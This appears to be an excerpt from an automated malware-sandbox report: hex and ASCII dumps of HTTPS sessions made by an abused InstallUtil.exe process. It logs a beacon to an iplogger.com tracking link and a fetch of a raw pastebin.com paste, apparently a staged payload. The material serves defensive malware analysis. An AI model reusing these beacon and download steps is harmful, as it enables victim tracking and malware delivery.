                                                2024-08-09 21:00:54 UTC463INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                                                Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                                                2024-08-09 21:00:54 UTC1369INData Raw: 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70
                                                Data Ascii: sit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta p
                                                2024-08-09 21:00:54 UTC1369INData Raw: 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d
                                                Data Ascii: round-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-
                                                2024-08-09 21:00:54 UTC1369INData Raw: 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66
                                                Data Ascii: or.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf
                                                2024-08-09 21:00:54 UTC1369INData Raw: 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62
                                                Data Ascii: pt><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;b
                                                2024-08-09 21:00:54 UTC1369INData Raw: 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69
                                                Data Ascii: t:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><di
                                                2024-08-09 21:00:54 UTC162INData Raw: 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: ,a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                                                2024-08-09 21:00:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.649723172.67.188.1784434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:00:58 UTC68OUTGET /1djqU4 HTTP/1.1
                                                Host: iplogger.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:00:59 UTC1285INHTTP/1.1 403 Forbidden
                                                Date: Fri, 09 Aug 2024 21:00:58 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                Cross-Origin-Embedder-Policy: require-corp
                                                Cross-Origin-Opener-Policy: same-origin
                                                Cross-Origin-Resource-Policy: same-origin
                                                Origin-Agent-Cluster: ?1
                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                Referrer-Policy: same-origin
                                                X-Content-Options: nosniff
                                                X-Frame-Options: SAMEORIGIN
                                                cf-mitigated: challenge
                                                2024-08-09 21:00:59 UTC687INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 67 65 37 4d 35 45 2b 57 63 6b 44 61 31 41 45 31 63 54 6e 42 5a 48 59 32 73 64 52 48 79 46 2b 31 45 52 31 6f 30 5a 6a 61 4d 6b 58 66 49 38 45 64 71 4f 6c 63 64 63 78 53 69 79 65 51 30 57 43 42 64 56 66 36 6b 42 4b 74 54 2f 74 65 51 52 33 78 6a 41 4d 31 78 56 39 6c 62 69 53 51 6b 75 7a 78 34 6f 57 64 74 36 2b 6b 4a 68 34 3d 24 77 77 77 6e 64 77 67 52 38 66 45 56 57 4d 76 69 37 37 54 46 2f 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                Data Ascii: cf-chl-out: ge7M5E+WckDa1AE1cTnBZHY2sdRHyF+1ER1o0ZjaMkXfI8EdqOlcdcxSiyeQ0WCBdVf6kBKtT/teQR3xjAM1xV9lbiSQkuzx4oWdt6+kJh4=$wwwndwgR8fEVWMvi77TF/A==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                2024-08-09 21:00:59 UTC1369INData Raw: 33 63 32 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                Data Ascii: 3c28<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                2024-08-09 21:00:59 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                                Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                                2024-08-09 21:00:59 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                                2024-08-09 21:00:59 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                                Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                                2024-08-09 21:00:59 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                                Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                                2024-08-09 21:00:59 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                                Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                                2024-08-09 21:00:59 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                                Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                                2024-08-09 21:00:59 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 69 70 6c 6f 67 67 65 72 2e 63 6f 6d 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 37 32 31 30 30 27 2c 63 52 61 79 3a 20 27 38 62 30 61 61 64 63 34 61 39 35 64 30 63 65 35 27 2c 63 48 61 73 68 3a 20 27 35 32 37 64 35 35 38 30 65 38 65 32 65 35 35 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 31 64 6a 71 55 34 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 36 71 44 6a 6b 38 69 66 64 74 78 6a 6e 4b 68 71 49 37 78 30 36 42 35 6a 5f 53 5a 50 6c 30 59 70 69 4b 6a 48 6e 61 6c 35 36 7a 55 2d 31 37 32 33 32 33 37 32 35 38 2d 30 2e 30 2e 31 2e 31 2d 33 36 36 38 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54
                                                Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "iplogger.com",cType: 'managed',cNounce: '72100',cRay: '8b0aadc4a95d0ce5',cHash: '527d5580e8e2e55',cUPMDTk: "\/1djqU4?__cf_chl_tk=6qDjk8ifdtxjnKhqI7x06B5j_SZPl0YpiKjHnal56zU-1723237258-0.0.1.1-3668",cFPWv: 'g',cT
                                                2024-08-09 21:00:59 UTC1369INData Raw: 65 6d 34 4d 55 56 63 6d 6d 52 58 53 6e 6d 68 59 74 5a 72 42 31 32 35 52 31 4b 75 46 5f 76 36 41 64 55 34 5a 65 31 51 33 6d 41 4f 44 50 33 42 63 55 37 6b 66 43 32 57 68 47 74 4d 4a 50 42 52 63 71 43 57 47 64 52 62 62 33 55 77 5a 45 63 4c 37 69 54 4b 36 56 49 7a 2e 5a 54 45 6c 42 74 47 65 35 53 35 42 75 38 54 33 5a 30 76 77 38 47 77 4e 4f 4f 74 41 58 36 37 31 7a 59 46 44 39 46 47 4a 49 45 39 58 6e 32 66 4e 47 41 35 47 65 30 51 55 61 7a 45 2e 68 4f 77 4a 4a 6d 4a 34 53 32 46 65 4c 54 33 56 6b 69 4e 49 49 34 68 64 6a 56 4a 41 65 63 62 57 73 39 32 58 6f 2e 59 49 5f 66 41 7a 74 36 76 50 75 64 68 69 6d 64 54 61 4a 32 71 31 76 4e 30 76 4e 42 73 36 45 79 7a 58 77 55 42 65 4a 38 57 58 4c 43 76 74 6d 4e 63 6b 45 4b 70 4c 35 70 4f 50 37 47 49 54 4c 5a 41 31 56 7a 4a
                                                Data Ascii: em4MUVcmmRXSnmhYtZrB125R1KuF_v6AdU4Ze1Q3mAODP3BcU7kfC2WhGtMJPBRcqCWGdRbb3UwZEcL7iTK6VIz.ZTElBtGe5S5Bu8T3Z0vw8GwNOOtAX671zYFD9FGJIE9Xn2fNGA5Ge0QUazE.hOwJJmJ4S2FeLT3VkiNII4hdjVJAecbWs92Xo.YI_fAzt6vPudhimdTaJ2q1vN0vNBs6EyzXwUBeJ8WXLCvtmNckEKpL5pOP7GITLZA1VzJ


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.649724172.67.19.244434876C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-09 21:00:59 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                                Host: pastebin.com
                                                Connection: Keep-Alive
                                                2024-08-09 21:00:59 UTC222INHTTP/1.1 200 OK
                                                Date: Fri, 09 Aug 2024 21:00:59 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                X-Frame-Options: SAMEORIGIN
                                                Server: cloudflare
                                                CF-RAY: 8b0aadca7d79c332-EWR
